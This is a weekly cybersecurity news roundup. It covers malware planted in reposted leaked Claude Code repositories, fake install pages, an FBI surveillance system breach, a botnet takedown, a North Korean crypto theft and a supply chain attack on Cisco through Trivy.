Malware-Laced Claude Code Repos and a Wave of Major Cybersecurity Incidents
From hackers embedding malware in leaked AI source code to a record-breaking botnet takedown, this week's cybersecurity landscape is intense.
Cybersecurity Roundup: Malware, Breaches, and Billion-Dollar Crypto Heists
This week in cybersecurity delivered no shortage of alarming developments — from government data exposed through basic internet searches to nation-state hackers targeting federal surveillance systems. Here's a breakdown of the most significant stories making waves across the security world.
Border Protection Data Found on a Flashcard App
In a startling discovery, WIRED revealed that sensitive facility information belonging to US Customs and Border Protection was publicly accessible through simple Google searches. The data — including gate access codes to CBP facilities — had been uploaded by users to Quizlet, a popular online study platform. The incident underscores the growing risk of employees inadvertently exposing classified or sensitive operational details through everyday digital tools.
Apple Issues Rare Patches for Older iOS Amid DarkSword Threat
Apple made an unusual decision this week, releasing security patches for iOS 18 — an older version of its operating system — to shield users who have not yet upgraded to iOS 26. The patches target DarkSword, a dangerous exploit first identified in March that enables attackers to silently compromise iPhones simply by luring users to a malicious website. After initially pushing users to upgrade to the latest iOS version, Apple reversed course and issued the backported fix as DarkSword infections continued to spread.
US-Israel Conflict With Iran Threatens Tech Giants
Now entering its second month, the US-Israel military conflict with Iran is generating serious cybersecurity concerns for major American corporations. Iran has threatened to launch cyberattacks against more than a dozen US companies — including Apple, Google, and Microsoft — which maintain offices and data infrastructure throughout the Gulf region. The conflict continues to disrupt global trade, with shipping crews still stranded in the strategically critical Strait of Hormuz.
Hackers Weaponize Leaked Claude Code With Hidden Malware
Earlier this week, a security researcher discovered that Anthropic had accidentally made the source code for Claude Code — its widely used AI-driven coding assistant — publicly accessible. The leak quickly spread across GitHub as developers rushed to repost and archive the repositories. However, cybersecurity outlet BleepingComputer warned that not all of those uploads are safe: malicious actors have embedded infostealer malware inside some of the copied repositories, turning public curiosity into a potential attack vector.
Anthropicresponded swiftly, issuing copyright takedown notices targeting thousands of GitHub repositories. Though the company initially flagged more than 8,000 repos for removal, it later narrowed its legal action to approximately 96 copies and derivative works, according to The Wall Street Journal.
Not the First Claude Code Attack
This incident follows a similar campaign from March, when 404 Media reported that fraudulent Google-sponsored ads were directing users to fake Claude Code installation pages. Visitors were tricked into running terminal commands that secretly downloaded malware onto their systems — exploiting the fact that many Claude Code users are unfamiliar with command-line interfaces.
FBI Declares Surveillance System Hack a National Security Incident
The FBI has officially designated a recent breach of one of its wiretap and surveillance collection systems as a "major incident" under the Federal Information Security Modernization Act (FISMA) — a classification reserved for breaches with serious national security implications. The declaration, reported to Congress this week, is reportedly the first such self-designation by the bureau since at least 2020.
According to Politico, senior Trump administration officials believe China is responsible for the intrusion. The FBI detected suspicious network activity in February, and a March 4 notification to Congress confirmed that the compromised systems — while unclassified — contained sensitive returns from legal processes, including phone and internet metadata collected under court orders and personal information related to active FBI investigations.
A Troubling Pattern of FBI Breaches
The latest hack fits into a broader and deeply concerning pattern. In 2023, a foreign actor accessed files tied to the FBI's Epstein investigation through an exposed forensic server. Last month, Iranian-linked hackers penetrated FBI Director Kash Patel's personal email account. And the Salt Typhoon campaign — attributed to Chinese hackers and uncovered in 2024 — compromised at least eight US telecom and internet service providers, ultimately affecting more than 200 companies across 80 countries.
College Student Helps Dismantle Record-Breaking Botnet Network
Two weeks ago, US law enforcement announced the successful dismantling of four interconnected botnets — Aisuru, Kimwolf, JackSkid, and Mossad — responsible for some of the largest distributed denial-of-service (DDoS) attacks ever recorded. These botnets hijacked thousands of internet-of-things devices to flood targets with overwhelming volumes of junk traffic.
The Wall Street Journal this week spotlighted an unexpected hero in the investigation: Benjamin Brundage, a 22-year-old student at the Rochester Institute of Technology. Brundage spent months obsessively tracking the Kimwolf botnet, infiltrating Discord communities, and gathering technical intelligence that he ultimately handed over to law enforcement. His work proved instrumental in the operation's success and highlights the growing role that independent security researchers play in combating large-scale cybercrime.
North Korean Hackers Steal $280 Million From Crypto Platform Drift
The decentralized finance platform Drift has confirmed that $280 million was stolen in a cybersecurity breach, with blockchain analytics firm Elliptic pointing to North Korean state-sponsored hackers as the likely culprits. Investigators cited distinctive laundering patterns and network-level indicators consistent with previous North Korean operations.
The theft represents the vast majority of the estimated $300 million in cryptocurrency stolen by North Korean hackers so far in 2026. While massive, the heist still falls short of the $2 billion the regime's cyber operatives managed to steal throughout all of last year — suggesting the campaign is far from its peak.
Cisco Source Code Compromised in Supply Chain Attack
Networking giant Cisco became the latest high-profile victim of a software supply chain attack orchestrated by the hacker group TeamPCP. According to BleepingComputer, the attackers compromised the vulnerability scanning tool Trivy by injecting it with malicious code, then used the resulting access to steal developer credentials and breach Cisco's internal development environments — making off with portions of the company's source code and that of some of its clients.
The Cisco incident is part of a broader campaign by TeamPCP, which has also infiltrated AI software platform LiteLLM and the developer security tool CheckMarx using similar methods. The group's approach — embedding malware into widely trusted software tools — makes detection difficult and amplifies the potential damage across entire developer ecosystems.
Stay Vigilant
From leaked AI source code turned into malware distribution channels, to state-sponsored hackers targeting federal law enforcement infrastructure, the cybersecurity threat landscape continues to evolve at a rapid pace. Users and organizations alike are urged to verify the source of any software before downloading, keep operating systems fully updated, and remain alert to suspicious digital activity.
